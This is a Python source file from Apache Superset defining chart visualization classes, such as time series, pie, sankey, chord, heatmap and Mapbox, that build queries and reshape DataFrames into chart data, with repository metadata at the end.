raise Exception(_("Pick a time granularity for your time series"))
metric = fd.get('metric')
metric_2 = fd.get('metric_2')
df = df.pivot_table(
index=DTTM_ALIAS,
values=[metric, metric_2])
chart_data = self.to_series(df)
return chart_data
class NVD3TimeSeriesBarViz(NVD3TimeSeriesViz):
"""A bar chart where the x axis is time"""
viz_type = "bar"
sort_series = True
verbose_name = _("Time Series - Bar Chart")
class NVD3CompareTimeSeriesViz(NVD3TimeSeriesViz):
"""A line chart component where you can compare the % change over time"""
viz_type = 'compare'
verbose_name = _("Time Series - Percent Change")
class NVD3TimeSeriesStackedViz(NVD3TimeSeriesViz):
"""A rich stack area chart"""
viz_type = "area"
verbose_name = _("Time Series - Stacked")
sort_series = True
class DistributionPieViz(NVD3Viz):
"""Annoy visualization snobs with this controversial pie chart"""
viz_type = "pie"
verbose_name = _("Distribution - NVD3 - Pie Chart")
is_timeseries = False
def get_data(self, df):
df = df.pivot_table(
index=self.groupby,
values=[self.metrics[0]])
df.sort_values(by=self.metrics[0], ascending=False, inplace=True)
df = df.reset_index()
df.columns = ['x', 'y']
return df.to_dict(orient="records")
class HistogramViz(BaseViz):
"""Histogram"""
viz_type = "histogram"
verbose_name = _("Histogram")
is_timeseries = False
def query_obj(self):
"""Returns the query object for this visualization"""
d = super(HistogramViz, self).query_obj()
d['row_limit'] = self.form_data.get(
'row_limit', int(config.get('VIZ_ROW_LIMIT')))
numeric_column = self.form_data.get('all_columns_x')
if numeric_column is None:
raise Exception(_("Must have one numeric column specified"))
d['columns'] = [numeric_column]
return d
def get_data(self, df):
"""Returns the chart data"""
chart_data = df[df.columns[0]].values.tolist()
return chart_data
class DistributionBarViz(DistributionPieViz):
"""A good old bar chart"""
viz_type = "dist_bar"
verbose_name = _("Distribution - Bar Chart")
is_timeseries = False
def query_obj(self):
d = super(DistributionBarViz, self).query_obj() # noqa
fd = self.form_data
if (
len(d['groupby']) <
len(fd.get('groupby') or []) + len(fd.get('columns') or [])
):
raise Exception(
_("Can't have overlap between Series and Breakdowns"))
if not fd.get('metrics'):
raise Exception(_("Pick at least one metric"))
if not fd.get('groupby'):
raise Exception(_("Pick at least one field for [Series]"))
return d
def get_data(self, df):
fd = self.form_data
row = df.groupby(self.groupby).sum()[self.metrics[0]].copy()
row.sort_values(ascending=False, inplace=True)
columns = fd.get('columns') or []
pt = df.pivot_table(
index=self.groupby,
columns=columns,
values=self.metrics)
if fd.get("contribution"):
pt = pt.fillna(0)
pt = pt.T
pt = (pt / pt.sum()).T
pt = pt.reindex(row.index)
chart_data = []
for name, ys in pt.iteritems():
if pt[name].dtype.kind not in "biufc" or name in self.groupby:
continue
if isinstance(name, string_types):
series_title = name
elif len(self.metrics) > 1:
series_title = ", ".join(name)
else:
                labels = [str(s) for s in name[1:]]
                series_title = ", ".join(labels)
values = []
for i, v in ys.iteritems():
x = i
if isinstance(x, (tuple, list)):
x = ', '.join([str(s) for s in x])
else:
x = str(x)
values.append({
'x': x,
'y': v,
})
d = {
"key": series_title,
"values": values,
}
chart_data.append(d)
return chart_data
class SunburstViz(BaseViz):
"""A multi level sunburst chart"""
viz_type = "sunburst"
verbose_name = _("Sunburst")
is_timeseries = False
credits = (
'Kerry Rodden '
'@<a href="https://bl.ocks.org/kerryrodden/7090426">bl.ocks.org</a>')
def get_data(self, df):
# if m1 == m2 duplicate the metric column
cols = self.form_data.get('groupby')
metric = self.form_data.get('metric')
secondary_metric = self.form_data.get('secondary_metric')
if metric == secondary_metric:
ndf = df
            ndf.columns = cols + ['m1', 'm2']
else:
cols += [
self.form_data['metric'], self.form_data['secondary_metric']]
ndf = df[cols]
return json.loads(ndf.to_json(orient="values")) # TODO fix this nonsense
def query_obj(self):
qry = super(SunburstViz, self).query_obj()
qry['metrics'] = [
self.form_data['metric'], self.form_data['secondary_metric']]
return qry
class SankeyViz(BaseViz):
"""A Sankey diagram that requires a parent-child dataset"""
viz_type = "sankey"
verbose_name = _("Sankey")
is_timeseries = False
credits = '<a href="https://www.npmjs.com/package/d3-sankey">d3-sankey on npm</a>'
def query_obj(self):
qry = super(SankeyViz, self).query_obj()
if len(qry['groupby']) != 2:
raise Exception(_("Pick exactly 2 columns as [Source / Target]"))
qry['metrics'] = [
self.form_data['metric']]
return qry
def get_data(self, df):
df.columns = ['source', 'target', 'value']
recs = df.to_dict(orient='records')
hierarchy = defaultdict(set)
for row in recs:
hierarchy[row['source']].add(row['target'])
def find_cycle(g):
"""Whether there's a cycle in a directed graph"""
path = set()
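            # plain depth-first search; `path` holds the current DFS stack,
            # so meeting a vertex already on it means a cycle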
def visit(vertex):
path.add(vertex)
for neighbour in g.get(vertex, ()):
if neighbour in path or visit(neighbour):
return (vertex, neighbour)
path.remove(vertex)
for v in g:
cycle = visit(v)
if cycle:
return cycle
cycle = find_cycle(hierarchy)
if cycle:
raise Exception(_(
"There's a loop in your Sankey, please provide a tree. "
"Here's a faulty link: {}").format(cycle))
return recs
class DirectedForceViz(BaseViz):
"""An animated directed force layout graph visualization"""
viz_type = "directed_force"
verbose_name = _("Directed Force Layout")
credits = 'd3noob @<a href="http://bl.ocks.org/d3noob/5141278">bl.ocks.org</a>'
is_timeseries = False
def query_obj(self):
qry = super(DirectedForceViz, self).query_obj()
if len(self.form_data['groupby']) != 2:
raise Exception(_("Pick exactly 2 columns to 'Group By'"))
qry['metrics'] = [self.form_data['metric']]
return qry
def get_data(self, df):
df.columns = ['source', 'target', 'value']
return df.to_dict(orient='records')
class ChordViz(BaseViz):
"""A Chord diagram"""
viz_type = "chord"
verbose_name = _("Directed Force Layout")
credits = '<a href="https://github.com/d3/d3-chord">Bostock</a>'
is_timeseries = False
def query_obj(self):
qry = super(ChordViz, self).query_obj()
fd = self.form_data
qry['groupby'] = [fd.get('groupby'), fd.get('columns')]
qry['metrics'] = [fd.get('metric')]
return qry
def get_data(self, df):
df.columns = ['source', 'target', 'value']
        # Preparing a symmetrical matrix like d3.chords calls for
nodes = list(set(df['source']) | set(df['target']))
matrix = {}
for source, target in product(nodes, nodes):
matrix[(source, target)] = 0
for source, target, value in df.to_records(index=False):
matrix[(source, target)] = value
m = [[matrix[(n1, n2)] for n1 in nodes] for n2 in nodes]
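        # m[i][j] holds the flow from nodes[j] (source) into nodes[i]
        # (target), matching the (n1=source, n2=target) key order above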
return {
'nodes': list(nodes),
'matrix': m,
}
class CountryMapViz(BaseViz):
"""A country centric"""
viz_type = "country_map"
verbose_name = _("Country Map")
is_timeseries = False
    credits = 'From bl.ocks.org by john-guerra'
def query_obj(self):
qry = super(CountryMapViz, self).query_obj()
qry['metrics'] = [
self.form_data['metric']]
qry['groupby'] = [self.form_data['entity']]
return qry
def get_data(self, df):
fd = self.form_data
cols = [fd.get('entity')]
metric = fd.get('metric')
cols += [metric]
ndf = df[cols]
df = ndf
df.columns = ['country_id', 'metric']
d = df.to_dict(orient='records')
return d
class WorldMapViz(BaseViz):
"""A country centric world map"""
viz_type = "world_map"
verbose_name = _("World Map")
is_timeseries = False
credits = 'datamaps on <a href="https://www.npmjs.com/package/datamaps">npm</a>'
def query_obj(self):
qry = super(WorldMapViz, self).query_obj()
qry['metrics'] = [
self.form_data['metric'], self.form_data['secondary_metric']]
qry['groupby'] = [self.form_data['entity']]
return qry
def get_data(self, df):
from superset.data import countries
fd = self.form_data
cols = [fd.get('entity')]
metric = fd.get('metric')
secondary_metric = fd.get('secondary_metric')
if metric == secondary_metric:
ndf = df[cols]
# df[metric] will be a DataFrame
# because there are duplicate column names
ndf['m1'] = df[metric].iloc[:, 0]
ndf['m2'] = ndf['m1']
else:
cols += [metric, secondary_metric]
ndf = df[cols]
df = ndf
df.columns = ['country', 'm1', 'm2']
d = df.to_dict(orient='records')
for row in d:
country = None
if isinstance(row['country'], string_types):
country = countries.get(
fd.get('country_fieldtype'), row['country'])
if country:
row['country'] = country['cca3']
row['latitude'] = country['lat']
row['longitude'] = country['lng']
row['name'] = country['name']
else:
row['country'] = "XXX"
return d
class FilterBoxViz(BaseViz):
"""A multi filter, multi-choice filter box to make dashboards interactive"""
viz_type = "filter_box"
verbose_name = _("Filters")
is_timeseries = False
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
def query_obj(self):
qry = super(FilterBoxViz, self).query_obj()
groupby = self.form_data.get('groupby')
        if not groupby and not self.form_data.get('date_filter'):
raise Exception(_("Pick at least one filter field"))
qry['metrics'] = [
self.form_data['metric']]
return qry
def get_data(self, df):
qry = self.query_obj()
filters = [g for g in self.form_data['groupby']]
d = {}
for flt in filters:
qry['groupby'] = [flt]
df = super(FilterBoxViz, self).get_df(qry)
d[flt] = [{
'id': row[0],
'text': row[0],
'filter': flt,
'metric': row[1]}
for row in df.itertuples(index=False)
]
return d
class IFrameViz(BaseViz):
"""You can squeeze just about anything in this iFrame component"""
viz_type = "iframe"
verbose_name = _("iFrame")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = False
def get_df(self):
return None
class ParallelCoordinatesViz(BaseViz):
"""Interactive parallel coordinate implementation
Uses this amazing javascript library
https://github.com/syntagmatic/parallel-coordinates
"""
viz_type = "para"
verbose_name = _("Parallel Coordinates")
credits = (
'<a href="https://syntagmatic.github.io/parallel-coordinates/">'
'Syntagmatic\'s library</a>')
is_timeseries = False
def query_obj(self):
d = super(ParallelCoordinatesViz, self).query_obj()
fd = self.form_data
d['metrics'] = copy.copy(fd.get('metrics'))
second = fd.get('secondary_metric')
if second not in d['metrics']:
d['metrics'] += [second]
d['groupby'] = [fd.get('series')]
return d
def get_data(self, df):
return df.to_dict(orient="records")
class HeatmapViz(BaseViz):
"""A nice heatmap visualization that support high density through canvas"""
viz_type = "heatmap"
verbose_name = _("Heatmap")
is_timeseries = False
credits = (
'inspired from mbostock @<a href="http://bl.ocks.org/mbostock/3074470">'
'bl.ocks.org</a>')
def query_obj(self):
d = super(HeatmapViz, self).query_obj()
fd = self.form_data
d['metrics'] = [fd.get('metric')]
d['groupby'] = [fd.get('all_columns_x'), fd.get('all_columns_y')]
return d
def get_data(self, df):
fd = self.form_data
x = fd.get('all_columns_x')
y = fd.get('all_columns_y')
v = fd.get('metric')
if x == y:
df.columns = ['x', 'y', 'v']
else:
df = df[[x, y, v]]
df.columns = ['x', 'y', 'v']
norm = fd.get('normalize_across')
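        # 'heatmap' rescales over the whole matrix; any other value is taken
        # as a column to group by, rescaling within each group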
overall = False
max_ = df.v.max()
min_ = df.v.min()
bounds = fd.get('y_axis_bounds')
if bounds and bounds[0] is not None:
min_ = bounds[0]
if bounds and bounds[1] is not None:
max_ = bounds[1]
if norm == 'heatmap':
overall = True
else:
gb = df.groupby(norm, group_keys=False)
if len(gb) <= 1:
overall = True
else:
df['perc'] = (
gb.apply(
lambda x: (x.v - x.v.min()) / (x.v.max() - x.v.min()))
)
if overall:
df['perc'] = (df.v - min_) / (max_ - min_)
return {
'records': df.to_dict(orient="records"),
'extents': [min_, max_],
}
class HorizonViz(NVD3TimeSeriesViz):
"""Horizon chart
https://www.npmjs.com/package/d3-horizon-chart
"""
viz_type = "horizon"
verbose_name = _("Horizon Charts")
credits = (
'<a href="https://www.npmjs.com/package/d3-horizon-chart">'
'd3-horizon-chart</a>')
class MapboxViz(BaseViz):
"""Rich maps made with Mapbox"""
viz_type = "mapbox"
verbose_name = _("Mapbox")
is_timeseries = False
credits = (
'<a href=https://www.mapbox.com/mapbox-gl-js/api/>Mapbox GL JS</a>')
def query_obj(self):
d = super(MapboxViz, self).query_obj()
fd = self.form_data
label_col = fd.get('mapbox_label')
if not fd.get('groupby'):
d['columns'] = [fd.get('all_columns_x'), fd.get('all_columns_y')]
if label_col and len(label_col) >= 1:
if label_col[0] == "count":
raise Exception(_(
"Must have a [Group By] column to have 'count' as the [Label]"))
d['columns'].append(label_col[0])
if fd.get('point_radius') != 'Auto':
d['columns'].append(fd.get('point_radius'))
d['columns'] = list(set(d['columns']))
else:
# Ensuring columns chosen are all in group by
if (label_col and len(label_col) >= 1 and
label_col[0] != "count" and
label_col[0] not in fd.get('groupby')):
raise Exception(_(
"Choice of [Label] must be present in [Group By]"))
if (fd.get("point_radius") != "Auto" and
fd.get("point_radius") not in fd.get('groupby')):
raise Exception(_(
"Choice of [Point Radius] must be present in [Group By]"))
if (fd.get('all_columns_x') not in fd.get('groupby') or
fd.get('all_columns_y') not in fd.get('groupby')):
raise Exception(_(
"[Longitude] and [Latitude] columns must be present in [Group By]"))
return d
def get_data(self, df):
fd = self.form_data
label_col = fd.get('mapbox_label')
custom_metric = label_col and len(label_col) >= 1
metric_col = [None] * len(df.index)
if custom_metric:
if label_col[0] == fd.get('all_columns_x'):
metric_col = df[fd.get('all_columns_x')]
elif label_col[0] == fd.get('all_columns_y'):
metric_col = df[fd.get('all_columns_y')]
else:
metric_col = df[label_col[0]]
point_radius_col = (
[None] * len(df.index)
if fd.get("point_radius") == "Auto"
else df[fd.get("point_radius")])
# using geoJSON formatting
geo_json = {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"properties": {
"metric": metric,
"radius": point_radius,
},
"geometry": {
"type": "Point",
"coordinates": [lon, lat],
}
}
for lon, lat, metric, point_radius
in zip(
df[fd.get('all_columns_x')],
df[fd.get('all_columns_y')],
metric_col, point_radius_col)
]
}
return {
"geoJSON": geo_json,
"customMetric": custom_metric,
"mapboxApiKey": config.get('MAPBOX_API_KEY'),
"mapStyle": fd.get("mapbox_style"),
"aggregatorName": fd.get("pandas_aggfunc"),
"clusteringRadius": fd.get("clustering_radius"),
"pointRadiusUnit": fd.get("point_radius_unit"),
"globalOpacity": fd.get("global_opacity"),
"viewportLongitude": fd.get("viewport_longitude"),
"viewportLatitude": fd.get("viewport_latitude"),
"viewportZoom": fd.get("viewport_zoom"),
"renderWhileDragging": fd.get("render_while_dragging"),
"tooltip": fd.get("rich_tooltip"),
"color": fd.get("mapbox_color"),
}
class EventFlowViz(BaseViz):
"""A visualization to explore patterns in event sequences"""
viz_type = "event_flow"
verbose_name = _("Event flow")
credits = 'from <a href="https://github.com/williaster/data-ui">@data-ui</a>'
is_timeseries = True
def query_obj(self):
query = super(EventFlowViz, self).query_obj()
form_data = self.form_data
event_key = form_data.get('all_columns_x')
entity_key = form_data.get('entity')
        meta_keys = [
            col for col in form_data.get('all_columns')
            if col not in (event_key, entity_key)
        ]
query['columns'] = [event_key, entity_key] + meta_keys
        if form_data.get('order_by_entity'):
query['orderby'] = [(entity_key, True)]
return query
def get_data(self, df):
return df.to_dict(orient="records")
viz_types_list = [
TableViz,
PivotTableViz,
NVD3TimeSeriesViz,
NVD3DualLineViz,
NVD3CompareTimeSeriesViz,
NVD3TimeSeriesStackedViz,
NVD3TimeSeriesBarViz,
DistributionBarViz,
DistributionPieViz,
BubbleViz,
BulletViz,
MarkupViz,
WordCloudViz,
BigNumberViz,
BigNumberTotalViz,
SunburstViz,
DirectedForceViz,
SankeyViz,
CountryMapViz,
ChordViz,
WorldMapViz,
FilterBoxViz,
IFrameViz,
ParallelCoordinatesViz,
HeatmapViz,
BoxPlotViz,
TreemapViz,
CalHeatmapViz,
HorizonViz,
MapboxViz,
HistogramViz,
SeparatorViz,
EventFlowViz,
]
viz_types = OrderedDict([(v.viz_type, v) for v in viz_types_list
if v.viz_type not in config.get('VIZ_TYPE_BLACKLIST')])
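# A minimal sketch of how this registry is typically consumed elsewhere in
# Superset (hypothetical names, for illustration only):
#
#     viz_cls = viz_types[form_data['viz_type']]
#     viz = viz_cls(datasource, form_data=form_data)
#     payload = viz.get_payload()
#
# The exact constructor signature and payload method vary across versions.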
|
FrederichCheng/incubator-superset
|
superset/viz.py
|
Python
|
apache-2.0
| 55,055
|
[
"VisIt"
] |
a61b29d16139c6d5de9ae1b30336d67fe776653fd60187ba4f042f395971d931
|